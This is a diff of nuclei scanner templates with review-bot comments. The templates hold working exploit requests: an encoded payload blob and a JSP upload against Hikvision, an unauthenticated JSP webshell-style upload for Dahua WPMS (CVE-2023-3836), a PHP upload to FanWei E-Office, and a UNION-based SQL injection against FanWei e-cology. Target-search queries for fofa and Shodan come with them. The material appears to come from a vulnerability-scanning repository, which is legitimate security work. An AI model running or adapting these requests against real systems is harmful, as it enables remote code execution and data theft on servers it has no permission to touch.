$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + Content-Type: image/jpeg + + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + + - | + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: res_id + json: + - ".data.resourceUuid" + internal: true matchers: - - type: word - words: - - "nt authority\\system" + - type: dsl + dsl: + - body_2 == str2 
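Review bot: `body_2 == str2` requires the JSP output to be byte-identical to the marker; trailing whitespace or a newline emitted by the container (or a leading one if the uploaded part picks up a CRLF) turns a successful upload into a miss, so `contains(body_2, str2) && status_code_2 == 200` is the safer check. The template uploads `{{str1}}.jsp` to `/eps/upload/` and leaves it there, which warrants the `intrusive` tag and a sentence in the description. `id: HIKVISION` is the same id as `Hikvision_iVMS-8700_upload.yaml` in this commit, and nuclei rejects duplicate ids when both are loaded; the stray `1` in `name:` (`Platform 1 upload`) looks like a typo.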
diff --git a/poc/upload/dahua-wpms-addimgico-fileupload.yaml b/poc/upload/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/upload/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/upload/dahua-wpms-addimgico-fileupload.yaml 
@@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index aa02a4941d..8c93d2bd55 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml 
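Review bot: The `description:` text is not a readable sentence (`... intelligence services,and other functions, including/emap/devicePoint_addImgIco?.`) and never states the flaw; suggested: `description: The Dahua Smart Park (WPMS) integrated management platform accepts arbitrary files through the unauthenticated /emap/devicePoint_addImgIco endpoint; uploads are stored under /upload/emap/society_new/ and are reachable over HTTP, allowing remote code execution via a JSP webshell.` The file written by request 1 (`{{random_str}}.jsp`, containing only the md5 marker) is left on the server after the scan, which the `intrusive` tag covers but the description should also mention. The regex extractor `ico_res_(\w+)_on\.jsp` has a capture group but no `group:`, so `shell_filename` is the full match — which is what the GET needs — and a one-line comment saying so would stop the next editor from "fixing" it with `group: 1`.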
@@ -1,52 +1,39 @@ id: FanWei info: - name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: fofa-query: app="泛微-EOffice" hunter-query: web.title="泛微软件" - -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - http: - raw: - | - POST /webservice/upload.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl - Accept-Encoding: gzip - Connection: close + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip - ------WebKitFormBoundaryakbyiukl - Content-Disposition: form-data; name="file"; filename="a.php4" - Content-Type: application/octet-stream + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg - - ------WebKitFormBoundaryakbyiukl-- + - - | - GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: name - group: 1 - regex: - - '([/*0-9a-zA-Z]+)\.php4$' - 
internal: true + --e64bdf16c554bbc109cecef6451c26a4-- + req-condition: true matchers: - type: dsl dsl: - - body_2 == str2 - -# http://your-ip/attachment/回显的那串数字/a.php4 + - 'status_code_1 == 200 && len(body) > 0' + condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/upload/ecology_E-Office_upload.yaml b/poc/upload/ecology_E-Office_upload.yaml index aa02a4941d..4e7ede529c 100644 --- a/poc/upload/ecology_E-Office_upload.yaml +++ b/poc/upload/ecology_E-Office_upload.yaml 
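Review bot: The new matcher `status_code_1 == 200 && len(body) > 0` accepts any non-empty 200 from `/inc/jquery/uploadify/uploadify.php` — an error or default page included — so it flags hosts where nothing was uploaded; the removed second request that fetched the file back was the only real confirmation. The trailing comment `# /attachment/3466744850/xxx.php` suggests the response carries the attachment directory id; extract it and GET `/attachment/{{id}}/{{name}}.php`, checking for a per-run marker in the body, instead of uploading an empty `test.php`. `Content-Length: 259` is hand-written and will be wrong as soon as the body changes; in non-unsafe raw mode nuclei recomputes it anyway, so drop the header. `id: FanWei` is shared with `ecology_E-Office_upload.yaml` in this commit, which nuclei treats as a duplicate id.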
@@ -1,52 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" - + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' http: - raw: - | - POST /webservice/upload.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl - Accept-Encoding: gzip - Connection: close - - ------WebKitFormBoundaryakbyiukl - Content-Disposition: form-data; name="file"; filename="a.php4" - Content-Type: application/octet-stream - - - ------WebKitFormBoundaryakbyiukl-- - - - | - GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: name - group: 1 - regex: - - '([/*0-9a-zA-Z]+)\.php4$' - internal: true + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate + Connection: close + req-condition: true matchers: - type: dsl dsl: - - body_2 == str2 - -# http://your-ip/attachment/回显的那串数字/a.php4 + - 'contains(body_1, "c4ca")' + 
condition: and diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml 
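Review bot: `contains(body_1, "c4ca")` matches only four hex characters, which can appear in any token, hash or CSS colour on the page; the injected `HashBytes('MD5','1')` rendered through `fn_sqlvarbasetostr` should yield the full `0xc4ca4238a0b923820dcc509a6f75849b`, so match `c4ca4238a0b923820dcc509a6f75849b` and add `status_code_1 == 200`. `HashBytes`/`db_name()` are SQL Server functions, so deployments on other databases return an error and are reported clean — worth a line in the description or a second payload. The file was rewritten from an E-Office upload PoC into an e-cology `HrmCareerApplyPerView.jsp` SQL injection but keeps the `ecology_E-Office_upload.yaml` name and `id: FanWei`, which now collides with `ecology_E-Office_Uploadify_FileUpload.yaml`; rename the file and use an id such as `fanwei-ecology-hrmcareerapplyperview-sqli`. The trailing `-` in `obtain sensitive information-` is a typo.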
@@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file
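Review bot: The rewritten `description` no longer says what the flaw is — it describes the product and trails off in `including/emap/devicePoint_addImgIco?.` — so a reader of a finding gets no statement of cause or impact, even though the rest of the template (CWE-434, PR:N, the JSP upload) makes it clear. Replace it with something like `The /emap/devicePoint_addImgIco endpoint does not validate the name or type of the uploaded file, so an unauthenticated attacker can place a JSP under /upload/emap/society_new/ and execute code on the server.` The template also leaves the uploaded `{{random_str}}.jsp` on the target (apparently renamed to `ico_res_*_on.jsp`, judging by the extractor regex) and has no cleanup step; the `intrusive` tag alone does not tell operators which artifact to remove, so a one-line `# NOTE: the uploaded ico_res_*_on.jsp remains on the target and must be removed manually` comment above `variables:` would help.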
